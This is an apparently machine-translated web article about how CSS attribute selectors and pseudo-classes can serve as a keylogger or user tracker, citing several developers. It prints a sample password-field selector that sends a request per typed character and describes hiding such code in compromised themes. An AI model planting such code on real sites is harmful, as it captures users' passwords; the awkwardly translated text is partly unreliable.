Pooh: What you could do with CSS, but shouldn’t

You had known it? A Keylogger or a discrete User-functioning-Tracking is easy to make using CSS to implement. The complicity takes a little bit of Javascript.

The Hashtag #DevDiscuss on Twitter brings up a whimsical themes. Here’s Aaron Powell shows you how to get a Keylogger or User Tracking relatively straightforward with CSS could be built. For the Processing of the entries in addition, it requires a little Javascript, but in today’s Web anyway developer triad, in addition to HTML and CSS.

A CSS Keylogger, expects to none

Keylogger small programs that are able to be each of your keystrokes to draw, to write into a text file and send it to the Grinch (or one of the other villains) are. Trojan bring happy times such a “Tool”. But it is also much easier. The developers of your “trust” could quickly have a Keylogger with CSS built better, you know the risks.

We have not shown the required Code completely, so that no one by simply Copy-and-Paste can build a Logger. The following CSS Code proposes Powell:

input[type="password"][value$="a"] {
background-image: url("https://localhost:3000/a");

The Code looks slimmer than he is, ultimately, because he works Mainly on foot. The theory States that when a user presses within the password field, and the letters A, a Request is sent to the specified URL. This triggers an entry in a Server Log, which can ultimately be read.

The above line of Code would have to be repeated for each possible character that might appear in a password field. That would be given would be able to read a Log-access is justified on the basis of the chronology of the typed password.

The identical Code can be found in this post on the developer’s Bramus Van Damme. Van Damme comes to the conclusion that there is no reason to worry, because ultimately, the Tap about passwords functioning as reliable. After all, could move users with a mouse and keyboard, still in the box, what would the chronology is confused.

For Powell brings a Javascript into the game to deliver exactly the level of reliability, the Van Damme of the solution denies. This, however, resist Van dam evaluation does not speak to the extent that this applies only to refer to the technique as “pure CSS Keylogger”.

To be read by Javascript, is certainly also a little something that a developer of a site knowingly and willingly would implement, but it could be quite simply pushed in a compromised Framework or a WordPress Theme. Here also the functioning of some of the Frameworks is favourable. The popular React Framework synchronized around the input with each new value, which allows for the Logging of legal safely.

A Proof-of-Concept as a Chrome Extension for you here on Github to find and understand. The Javascript, we can save us at this point.

User Tracking using CSS pseudo-classes

According to the same principle, a User could be Tracking set up. The Code could look something like this:

#demo-02 p:hover {
background-color: #f0a;

#demo-02 input:focus {
background-color: #bada55;


#demo-02 button:active {
color: #ff0000;



Instead of the value of background-color, could be re-accessed via the background-image to a Tracking Url. The starting point of the tracking in the example used pseudo-classes :hover, are, :focus, and :active. The state changes to trigger sufficient to detect user activity.

We could now use to detect in a form as the user moves through the form, as long as he lingers on each of the fields, such as Navigation goes, or whether the answers in the check boxes will be changed later. Also outside of the forms, we can determine where the user is at the moment – after all, ranged :hover already.

In mid-September of this year, the developer Lars Wikman laid open under the title “Is this evil?” his thoughts to use CSS-based User Tracking as a substitute for the use of Analytics Software. After all, he would be able to in this way, the automated Traffic from its Logs to keep. Ultimately, Wikman decided against it, because he is of the opinion that you should do with a Browser, not the things for which he has not invented.

Australia’s Aaron Powell sees the loose. He is the point of contact for developers and, as such, an employee of the Software manufacturer Microsoft. As an active front – end and Open-Source developer, he moves around in the environment of the CMS Umbraco. Web developers may know httpstat.us. This is a Service to the Test, such as a Website with different HTTP Codes deals. These will be given to finishing the URL.

Powell had worked to their longer with the idea to publish a few “unusual” CSS applications. The Hashtag #DevDiscuss on Twitter was ultimately the impetus.

How do you see that? Where should we draw the line between what can be done and what should be done?

Fits to: Tailwind CSS: How is the byproduct of a side-project to a multi-million business was

Ready to see us in action:

More To Explore

Enable registration in settings - general
Have any project in mind?

Contact us: